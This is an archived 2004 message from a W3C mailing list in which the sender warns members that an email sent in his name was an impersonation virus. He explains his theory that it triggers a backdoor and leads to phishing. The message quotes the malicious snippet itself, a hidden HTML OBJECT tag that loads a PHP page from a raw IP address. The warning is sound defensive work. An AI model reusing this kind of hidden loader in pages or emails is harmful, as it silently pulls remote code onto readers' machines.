RE: Site changes from Hallam-Baker, Phillip on 2004-03-18 (www-xkms@w3.org from March 2004)

From: Hallam-Baker, Phillip <pbaker@verisign.com>
Date: Thu, 18 Mar 2004 06:50:00 -0800
To: "Hallam-Baker, Phillip" <pbaker@verisign.com>, www-xkms@w3c.org
Message-ID: <C6DDA43B91BFDA49AA2F1E473732113E5DBA5B@mou1wnexm05.vcorp.ad.vrsn.com>

Please, no more messages telling me I have a virus. I don't, this is an
impersonation virus. Look at the headers.
 
Embedded in the message is some active code that goes to a web site, it
appears that what it does is to activate a backdoor left by a previous
virus.
 
  <OBJECT style="DISPLAY: none" 
 
data=http://24.171.136.45:81/617598.php></OBJECT></FONT></BLOCKQUOTE></BODY>
</HTML>
 
My current theory is that MyDoom or the like opens up a backdoor, then the
capture messages are sent by the second virus. If you get bit then they
start running a phishing scam on your machine.
 
I have not got complete proof of this yet, but I am working with our
anti-phishing team to see if we can find it.
 
        Phill

-----Original Message-----
From: www-xkms-request@w3.org [mailto:www-xkms-request@w3.org]On Behalf Of
pbaker@verisign.com
Sent: Thursday, March 18, 2004 1:37 AM
To: www-xkms@w3c.org
Subject: Site changes

Received on Thursday, 18 March 2004 09:50:12 UTC